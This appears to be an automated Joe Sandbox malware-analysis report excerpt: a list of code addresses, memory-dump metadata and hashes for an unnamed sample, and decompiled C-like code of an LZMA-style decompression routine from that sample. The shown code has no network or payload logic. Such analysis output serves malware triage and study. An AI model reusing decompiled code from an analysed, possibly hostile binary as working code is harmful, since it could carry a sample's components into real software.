                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725b
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x0040731a
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407237
                                                                                                                                                                                                                            0x00407239
                                                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                                                            0x0040723f
                                                                                                                                                                                                                            0x00407242
                                                                                                                                                                                                                            0x00407244
                                                                                                                                                                                                                            0x00407247
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x00407250
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071e0
                                                                                                                                                                                                                            0x004071e2
                                                                                                                                                                                                                            0x004071e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f48
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00406f4e
                                                                                                                                                                                                                            0x00406f4e
                                                                                                                                                                                                                            0x00406f51
                                                                                                                                                                                                                            0x00406f54
                                                                                                                                                                                                                            0x00406f57
                                                                                                                                                                                                                            0x00406f5a
                                                                                                                                                                                                                            0x00406f5d
                                                                                                                                                                                                                            0x00406f60
                                                                                                                                                                                                                            0x00406f62
                                                                                                                                                                                                                            0x00406f65
                                                                                                                                                                                                                            0x00406f68
                                                                                                                                                                                                                            0x00406f6b
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070df
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x00407490

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                                                                                                                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
